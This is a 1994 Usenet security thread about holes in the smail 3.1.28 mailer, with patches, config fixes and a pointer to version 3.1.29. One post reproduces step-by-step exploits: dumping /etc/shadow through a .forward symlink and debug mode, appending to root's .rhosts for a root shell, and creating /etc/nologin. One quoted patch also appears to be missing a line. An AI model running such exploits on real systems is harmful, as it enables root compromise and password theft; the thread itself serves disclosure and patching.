patch need of smail 3.1.28

patch need of smail 3.1.28

Post by h.. » Fri, 04 Nov 1994 18:55:24



Hei ,
        Somebody tell me that smail 3.1.28 find a big hole lately ,
        Anybody can tell is it true ? Appreciate if more detail :)
        And , where could I find patch of it ?
        ThanX:)

 
 
 

patch need of smail 3.1.28

Post by Tilman Schmi » Sat, 05 Nov 1994 19:22:59




>    Somebody tell me that smail 3.1.28 find a big hole lately ,
>    Anybody can tell is it true ? Appreciate if more detail :)
>    And , where could I find patch of it ?
>    ThanX:)

You surely mean the good old smtp_debug flag which allows people
to connect to smail by telnetting the SMTP port and do evil deeds
with debug commands.  Just put the line

-smtp_debug

in your smail config file and you're safe.  (Against that
particular attack, that is.  ;-)

HTH
Tilman

--
Tilman Schmidt                              Phone:  +49 221 8299 275
Sema Group Deutschland GmbH                 Fax:    +49 221 8299 266


 
 
 

patch need of smail 3.1.28

Post by Christopher Samu » Wed, 09 Nov 1994 23:22:00




Quote:>    Somebody tell me that smail 3.1.28 find a big hole lately ,
>    Anybody can tell is it true ? Appreciate if more detail :)
>    And , where could I find patch of it ?

You could always try:

        ftp://src.doc.ic.ac.uk/packages/mail/smail/smail-3.1.29.tar.gz

There's a linux binary distribution as well as the documentation there
for it in that directory as well..

good luck!
Chris
--

 N-115, Defence Research Agency,  St Andrews Road, Great Malvern, England, UK

 
 
 

patch need of smail 3.1.28

Post by Nick Hillia » Mon, 07 Nov 1994 00:05:01



: >  Somebody tell me that smail 3.1.28 find a big hole lately ,
: >  Anybody can tell is it true ? Appreciate if more detail :)
: >  And , where could I find patch of it ?
: >  ThanX:)

: You surely mean the good old smtp_debug flag which allows people
: to connect to smail by telnetting the SMTP port and do evil deeds
: with debug commands.  Just put the line

: -smtp_debug

: in your smail config file and you're safe.  (Against that
: particular attack, that is.  ;-)

There are no known security holes in smail which _inherently_ involve
smtp_debug.  There is one security hole which can be fixed by applying the
patch below.  If you are running smail on linux, you need to define SETEUID
in the HAVE section of the configuration file.  Otherwise, smail does not
handle mail forwarding in a secure manner.

diff -rc smail-3.1.28.old/src/main.c smail-3.1.28/src/main.c
*** smail-3.1.28.old/src/main.c Fri Nov  4 00:04:30 1994
--- smail-3.1.28/src/main.c     Fri Nov  4 00:04:59 1994
***************
*** 335,341 ****
      if (config_file != save_config_file || arg_second_config_file ||
        arg_director_file || arg_router_file || arg_transport_file ||
        arg_qualify_file || arg_retry_file || arg_smail_lib_dir ||
!       arg_alias_file || operation_mode == REBUILD_ALIASES)
      {
        /*
         * a config_file was set, or unset from the command args
--- 335,341 ----
      if (config_file != save_config_file || arg_second_config_file ||
        arg_director_file || arg_router_file || arg_transport_file ||
        arg_qualify_file || arg_retry_file || arg_smail_lib_dir ||
!       arg_alias_file || arg_debug_file || operation_mode == REBUILD_ALIASES)
      {
        /*
         * a config_file was set, or unset from the command args

Nick
--
Thought for the day:
"Don't worry about people stealing your ideas.  If your ideas are any
good, you'll have to ram them down people's throats."
                -- Howard Aiken

 
 
 

patch need of smail 3.1.28

Post by Christopher Ellwo » Wed, 16 Nov 1994 14:59:43


In comp.security.unix, Tilman Schmidt said...

>In article <39ac2d$...@debbie.cc.nctu.edu.tw>,
> <h...@ccserv.cc.nccu.edu.tw> wrote:
>>        Somebody tell me that smail 3.1.28 find a big hole lately ,
>>        Anybody can tell is it true ? Appreciate if more detail :)
>>        And , where could I find patch of it ?
>>        ThanX:)

>You surely mean the good old smtp_debug flag which allows people
>to connect to smail by telnetting the SMTP port and do evil deeds
>with debug commands.  Just put the line

>-smtp_debug

>in your smail config file and you're safe.  (Against that
>particular attack, that is.  ;-)

Well, not quite.  The -smtp_debug prevents one method of exploiting
that bug, but there is another method that works just as well.

I've appended a summary of three smail bugs that someone posted a while
back.  Note that its likely that there are more bugs in smail than these
three.  Also note that I take no responsiblity for anything contained in
this message.  Use and abuse at your own risk.

- Chris

-----
***
Bug #1
***

SYNOPSIS
--------

Use of ~/.forward and debug lets a local user read any file on the system.

EXAMPLE OF EXPLOITATION
-----------------------

user@psyops ~> ln -s /etc/shadow .forward
user@psyops ~> ls -la .forward
lrwxrwxrwx   1 user     users          11 Sep  5 12:08 .forward -> /etc/shadow

user@psyops ~> telnet localhost smtp

Trying 127.0.0.1...
Connected to localhost
Escape character is '^]'.
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:10 PDT
debug 20
250 Debugging level: 20
expn user

[lots of text]

expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile:  opening forward file /home/user/.forward

[more text]

read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[....]

process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection
Connection closed by foreign host.
---------------

Contrary to popular belief, adding -smtp_debup to your smail config file
will not prevent this bug from occuring.  It will just prevent exploitation
via the smtp port.

We can just do this....

----------
user@psyops ~> smail -bs -v20
expand_string($primary_name Smail$version ready for mail on $date,(null),
(null)) called
expand_string returns psyops.warez.mil Smail3.1.28.1 ready for mail on
Mon, 5 Sep 94 12:15 PDT
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15
PDT
expn user

[same text as before]

expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile:  opening forward file /home/user/.forward

[more of same text]

read 890 bytes
director dotforward: matched user, forwarded to
root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[.....]

process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection

----------

To fix this, you should get rid of the -d and -v options for smail
as well as adding -smtp_debug to your config file.

***
Bug #2
***

SYNOPSIS
--------

Smail called with the -D flag will allow you to create and append to any
file on the system.

EXAMPLE OF EXPLOITATION
-----------------------
user@psyops ~> cat > ~/.forward

localhost user
^D
user@psyops ~> smail -bs -D ~root/.rhosts -v20
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:23 PDT
expn user
250 user
quit
221 psyops.warez.mil closing connection

user@psyops ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)

--------------

Patch this by removing the -D option from smail.

I received the following patch recently.  I haven't tested it, so use
at your own risk.

*** Omain.c     Wed Mar 11 12:33:18 1993
--- main.c      Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
      }

-     /*
-      * change error file to debugging file from -D option, if any
-      */
-
-     if (arg_debug_file) {
-       new_errfile = fopen(arg_debug_file, "a");
-       if (new_errfile == NULL) {
-           write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
-                     arg_debug_file, strerrno(errno));
-           arg_debug_file = NULL;
-       } else {
-           errfile = new_errfile;
-           fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
-                   program, (long)getpid());
-       }
-     }

      /*
       * read in the transport, router and director files, if needed
       *
       * NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
***************
*** 525,530 ****
--- 508,537 ----
      if (prog_euid != REQUIRED_EUID)
            queue_only = TRUE;
  #endif

+     /*
+      * change error file to debugging file from -D option, if any
+      *
+      * JMJ: Change location of this fragment to below the setuid/setgid
+      *      calls to allow for use of fopen_as_user() instead of just
+      *      fopen().
+      *
+      *      Side effect: -D now requires full pathname to debug file
+      */
+
+     if (arg_debug_file) {
+       new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid,
+           prog_egid, 0600);
+           write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+                     arg_debug_file, strerrno(errno));
+           arg_debug_file = NULL;
+       } else {
+           errfile = new_errfile;
+           fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
+                   program, (long)getpid());
+       }
+     }

      /*
       * error processing can be other than TERMINAL only for
--

***
Bug #3
***

SYNOPSIS
--------

Files specified in ~/.forward can be created in any directory, regardless
of it's permissions.  (File is still owned by mailbox owner, however.)

EXAMPLE OF EXPLOITATION
-----------------------

user@psyops ~> echo "/etc/nologin" > ~/.forward
user@psyops ~> mail -r root user < /dev/null
user@psyops ~> echo "Site shutdown due to smail lameness" >!  /etc/nologin
user@psyops ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.

---------

Plug up this hole by adding 'check_path' to the following part of
your /usr/lib/smail/transports file:

---
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file:   driver = appendfile,
        return_path, local, from, unix_from_hack;

        file = $user,                   # file is taken from address
        append_as_user,                 # use user-id associated with address
        expand_user,                    # expand ~ and $ within address
        check_path,   #<--add this line
        suffix = "\n",
        mode = 0644
[...]
---

 
 
 

patch need of smail 3.1.28

Post by Robert Iva » Thu, 10 Nov 1994 01:42:24




   > Somebody tell me that smail 3.1.28 find a big hole lately ,
   > Anybody can tell is it true ? Appreciate if more detail :)
   > And , where could I find patch of it ?
   > ThanX:)

   You surely mean the good old smtp_debug flag which allows people
   to connect to smail by telnetting the SMTP port and do evil deeds
   with debug commands.  Just put the line

   -smtp_debug

   in your smail config file and you're safe.  (Against that
   particular attack, that is.  ;-)

-smtp_debug shields only from the telnet attack. It doesn't shield you
against direct attack. And this one is the least serious. 3.1.28 has
another bug that enables a normal user to change any file on the system.
~root/.rhosts for example. I don't know where the patch is, I just
know that it is quite serious. Exploit scripts have been posted to
the bugtraq list.

Robert

 
 
 

patch need of smail 3.1.28

Post by Lyndon Nerenbe » Sat, 19 Nov 1994 15:46:06


All (I believe) of the security holes mentioned here have been fixed in
the 3.1.29 release. It's available from ftp.uu.net and it's mirrors ...

--lyndon